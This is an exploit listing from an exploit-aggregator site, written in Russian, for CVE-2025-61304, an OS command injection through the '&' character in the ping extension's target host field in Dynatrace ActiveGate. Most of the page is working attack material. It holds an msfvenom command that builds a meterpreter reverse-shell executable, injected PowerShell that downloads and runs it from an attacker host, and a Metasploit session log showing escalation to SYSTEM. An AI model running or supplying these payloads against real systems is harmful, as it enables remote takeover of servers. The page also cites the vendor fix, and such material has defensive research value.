Sploitus

Exploit for CVE-2025-61304

kitploit · 2026-09-02

Exploit Code

MARKDOWN73 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-PENTASTIC-BE-CVE-2025-61304
# CVE-2025-61304

"Уязвимость внедрения OS-команд в ping-расширение Dynatrace ActiveGate до версии 1.016 через специально сформированный IP-адрес"

В фоновом режиме ping-расширение использует командную строку Windows для выполнения ping. Поле ввода для Test Target Host также имеет длину 1024 символа. После IP-адреса можно дописать дополнительные команды для выполнения ActiveGate, просто используя символ '&'.

Сообщено в Dynatrace и исправлено этим коммитом: https://github.com/Dynatrace/dynatrace-api/pull/99

Эксплойт RCE для добавления пользователя:

![добавление_пользователя](https://assets.kitploit.com/production/public/readmes/42961/b7880f3729457f37694d7b9fcaaf9e446dcff353bcf35c108f785ce6faff2155.png)

Список локальных пользователей до и после:

![эксплойт](https://assets.kitploit.com/production/public/readmes/42961/7c25752dc803fbc0c72a72b02b10cd3e20adeed822166dfb120f536c6b205d08.png)

# Другие примеры полезных нагрузок:

  1. Создайте обратную оболочку meterpreter:



root@kitploit:~
    
    
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.51.200 LPORT=4444 -f exe > mshell.exe
    

  2. Скачайте и выполните оболочку на ActiveGate через облачный интерфейс с помощью ping-расширения:



root@kitploit:~
    
    
    google&powershell.exe $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest http://192.168.51.200/mshell.exe -OutFile c:\test\mshell.exe
    
    google&c:\test\mshell.exe
    
    

  3. Полученная сессия



root@kitploit:~
    
    
    msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
    payload => windows/x64/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > run
    
    [*] Started reverse TCP handler on 192.168.51.200:4444 
    
    [*] Sending stage (200262 bytes) to 192.168.51.54
    [*] Meterpreter session 3 opened (192.168.51.200:4444 -> 192.168.51.54:49800 ) at 2023-01-21 19:02:16 +0100
    
    meterpreter > getuid
    Server username: NT AUTHORITY\LOCAL SERVICE
    meterpreter > getsystem 
    ...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    
    meterpreter > sysinfo
    Computer        : WIN-9493M3CRTDV
    OS              : Windows 2016+ (10.0 Build 17763).
    Architecture    : x64
    System Language : en_US
    Domain          : WORKGROUP
    Logged On Users : 1
    Meterpreter     : x64/windows